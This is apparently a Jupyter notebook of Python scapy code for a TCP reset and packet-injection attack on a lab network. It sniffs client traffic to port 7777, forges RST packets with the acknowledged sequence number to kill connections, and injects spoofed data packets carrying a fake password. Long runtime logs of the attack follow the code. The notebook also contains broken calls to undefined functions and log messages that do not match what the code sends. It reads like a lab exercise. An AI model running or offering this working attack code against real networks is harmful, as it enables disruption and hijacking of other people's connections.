In [1]:
import scapy

In [3]:
import random

In [4]:
def is_packet_tcp_client_to_server(server_ip, server_port, client_ip):
    def f(p):
        if not p.haslayer(TCP):
            return False

        src_ip = p[IP].src
        dst_ip = p[IP].dst
        dst_port = p[TCP].dport

        return src_ip == client_ip and dst_ip == server_ip and dst_port == server_port

    return f

In [5]:
server_ip = '10.0.0.16'
server_port = 7777
client_ip = '10.0.0.15'

In [7]:
def log_packet(p):
    return p.show()

In [8]:
def log(msg, params={}):
    formatted_params = " ".join([f"{k}={v}" for k, v in params.items()])
    print(f"{msg} {formatted_params}")

In [9]:
from scapy.all import *
import threading

In [17]:

def main():
        log('Sniff Started...')
        t = sniff(
            count=50,
            prn=send_rest_packet,
            lfilter=is_packet_tcp_client_to_server(server_ip, server_port, client_ip)
        )
        log('Sniff Finished.')

In [56]:
def send_reset(iface, seq_jitter=0, ignore_syn=True):
    """Set seq_jitter to be non-zero in order to prove to yourself that the
    sequence number of a RST segment does indeed need to be exactly equal
    to the last sequence number ACK-ed by the receiver"""
    def f(p):
        src_ip = p[IP].src
        src_port = p[TCP].sport
        dst_ip = p[IP].dst
        dst_port = p[TCP].dport
        seq = p[TCP].seq
        ack = p[TCP].ack
        flags = p[TCP].flags

        log(
            "Grabbed packet",
            {
                "src_ip": src_ip,
                "dst_ip": dst_ip,
                "src_port": src_port,
                "dst_port": dst_port,
                "seq": seq,
                "ack": ack,
            }
        )

        if "S" in flags and ignore_syn:
            print("Packet has SYN flag, not sending RST")
            return

        # Don't allow a -ve seq
        jitter = random.randint(max(-seq_jitter, -seq), seq_jitter)
        if jitter == 0:
            print("jitter == 0, this RST packet should close the connection")

        rst_seq = ack + jitter
        p = IP(src=dst_ip, dst=src_ip) / TCP(sport=dst_port, dport=src_port, flags="R", window=DEFAULT_WINDOW_SIZE, seq=rst_seq)

        log(
            "Sending RST packet...",
            {
                "orig_ack": ack,
                "jitter": jitter,
                "seq": rst_seq,    
            },
        )

        send(p, verbose=0, iface=iface)

    return f

In [57]:
def main():
        log('Sniff Started...')
        t = sniff(
            count=50,
            prn=send_rest(),
            lfilter=is_packet_tcp_client_to_server(server_ip, server_port, client_ip)
        )
        log('Sniff Finished.')

In [83]:
from scapy.all import *
import threading
import random

DEFAULT_WINDOW_SIZE = 2052

def log(msg, params={}):
    formatted_params = " ".join([f"{k}={v}" for k, v in params.items()])
    print(f"{msg} {formatted_params}")


def is_packet_on_tcp_conn(server_ip, server_port, client_ip):
    def f(p):
        return (
            is_packet_tcp_server_to_client(server_ip, server_port, client_ip)(p) or
            is_packet_tcp_client_to_server(server_ip, server_port, client_ip)(p)
        )

    return f


def is_packet_tcp_server_to_client(server_ip, server_port, client_ip):
    def f(p):
        if not p.haslayer(TCP):
            return False

        src_ip = p[IP].src
        src_port = p[TCP].sport
        dst_ip = p[IP].dst

        return src_ip == server_ip and src_port == server_port and dst_ip == client_ip

    return f


def is_packet_tcp_client_to_server(server_ip, server_port, client_ip):
    def f(p):
        if not p.haslayer(TCP):
            return False

        src_ip = p[IP].src
        dst_ip = p[IP].dst
        dst_port = p[TCP].dport

        return src_ip == client_ip and dst_ip == server_ip and dst_port == server_port

    return f


def send_packets(flipped, seq_jitter=0, ignore_syn=True):
    """Set seq_jitter to be non-zero in order to prove to yourself that the
    sequence number of a RST segment does indeed need to be exactly equal
    to the last sequence number ACK-ed by the receiver"""
    def f(p):
        src_ip = p[IP].src
        src_port = p[TCP].sport
        dst_ip = p[IP].dst
        dst_port = p[TCP].dport
        seq = p[TCP].seq
        ack = p[TCP].ack
        flags = p[TCP].flags

        log(
            "Grabbed packet",
            {
                "src_ip": src_ip,
                "dst_ip": dst_ip,
                "src_port": src_port,
                "dst_port": dst_port,
                "seq": seq,
                "ack": ack,
            }
        )

        if "S" in flags and ignore_syn:
            print("Syn Detected, Sending Wrong Password.")
            return

        # Don't allow a -ve seq
        rst_seq = ack
        if flipped:
                p = IP(src=dst_ip, dst=src_ip) / TCP(sport=dst_port, dport=src_port, flags="PA", window=DEFAULT_WINDOW_SIZE, seq=ack, ack=seq)/Raw(load='05wrong')
        else:
            p = IP(src=src_ip, dst=dst_ip) / TCP(sport=src_port, dport=dst_port, flags="PA", window=DEFAULT_WINDOW_SIZE, seq=ack, ack=seq)/Raw(load='05wrong')

        log(
            "Sending RST packet...",
            {
                "orig_ack": ack,
                "seq": rst_seq,    
            },
        )

        send(p, verbose=0)
        
#         p = IP(src=src, dst=src_ip) / TCP(sport=dst_port, dport=src_port, flags="RA", window=DEFAULT_WINDOW_SIZE, seq=ack, akc=seq)

    return f


def log_packet(p):
    """This prints a big pile of debug information. We could make a prettier
    log function if we wanted."""
    return p.show()


if __name__ == "__main__":

    log("Starting sniff...")
    t = sniff(
#         count=50,
        # NOTE: uncomment `send_reset` to run the reset attack instead of
        # simply logging the packet.
        # prn=send_reset(iface),
        prn=send_reset('eth0'),
        lfilter=is_packet_tcp_client_to_server('10.0.0.16', 7777, '10.0.0.15'))
    log("Finished sniffing!")

Starting sniff... 
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319549 ack=0
Syn Detected, Sending Wrong Password.
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=1

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 ds

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 ds

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 ds

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 ds

...

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3271298310 ack=3081668904
Sending RST packet... orig_ack=3081668904 seq=3081668904
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37640 dst_port=7777 seq=2871145568 ack=512382247
Sending RST packet... orig_ack=512382247 seq=512382247
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3271298317 ack=3081668905
Sending RST packet... orig_ack=3081668905 seq=3081668905
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37661 dst_port=7777 seq=2417585519 ack=1208492802
Sending RST packet... orig_ack=1208492802 seq=1208492802
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3790895245 ack=3531286896
Sending RST packet... orig_ack=3531286896 seq=3531286896
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319557
Sending RST packet... orig_ack=156319557 seq=156319557
Grabbed packet sr

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37661 dst_port=7777 seq=2417585519 ack=1208492802
Sending RST packet... orig_ack=1208492802 seq=1208492802
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3790895245 ack=3531286896
Sending RST packet... orig_ack=3531286896 seq=3531286896
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319557
Sending RST packet... orig_ack=156319557 seq=156319557
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3531286896 ack=3790895246
Sending RST packet... orig_ack=3790895246 seq=3790895246
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3081668904 ack=3271298310
Sending RST packet... orig_ack=3271298310 seq=3271298310
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37640 dst_port=7777 seq=2871145569 ack=512382247
Sending RST packet... orig_ack=512382247 seq=512382247
Grabbed packet sr

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3790895245 ack=3531286896
Sending RST packet... orig_ack=3531286896 seq=3531286896
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319557
Sending RST packet... orig_ack=156319557 seq=156319557
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3531286896 ack=3790895246
Sending RST packet... orig_ack=3790895246 seq=3790895246
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3081668904 ack=3271298310
Sending RST packet... orig_ack=3271298310 seq=3271298310
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37640 dst_port=7777 seq=2871145569 ack=512382247
Sending RST packet... orig_ack=512382247 seq=512382247
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3081668904 ack=3271298310
Sending RST packet... orig_ack=3271298310 seq=3271298310
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37640 dst_port=7777 seq=512382247 ack=2871145568
Sending RST packet... orig_ack=2871145568 seq=2871145568
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3081668905 ack=3271298317
Sending RST packet... orig_ack=3271298317 seq=3271298317
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37661 dst_port=7777 seq=1208492802 ack=2417585519
Sending RST packet... orig_ack=2417585519 seq=2417585519
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37602 dst_port=7777 seq=3531286896 ack=3790895245
Sending RST packet... orig_ack=3790895245 seq=3790895245
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319557 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet 

Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=156319550 ack=314530685
Sending RST packet... orig_ack=314530685 seq=314530685
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37661 dst_port=7777 seq=1208492803 ack=2417585519
Sending RST packet... orig_ack=2417585519 seq=2417585519
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37612 dst_port=7777 seq=1288645059 ack=794740183
Sending RST packet... orig_ack=794740183 seq=794740183
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37612 dst_port=7777 seq=794740184 ack=1288645059
Sending RST packet... orig_ack=1288645059 seq=1288645059
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37591 dst_port=7777 seq=314530685 ack=156319550
Sending RST packet... orig_ack=156319550 seq=156319550
Grabbed packet src_ip=10.0.0.15 dst_ip=10.0.0.16 src_port=37631 dst_port=7777 seq=3271298310 ack=3081668904
Sending RST packet... orig_ack=3081668904 seq=3081668904
Grabbed packet src_ip=

In [85]:
def wrong_password_attack():
    log("Starting sniff...")
    t = sniff(
#         count=50,
        # NOTE: uncomment `send_reset` to run the reset attack instead of
        # simply logging the packet.
        # prn=send_reset(iface),
        prn=send_reset('eth0'),
        lfilter=is_packet_tcp_client_to_server('10.0.0.16', 7777, '10.0.0.15'))
    log("Finished sniffing!")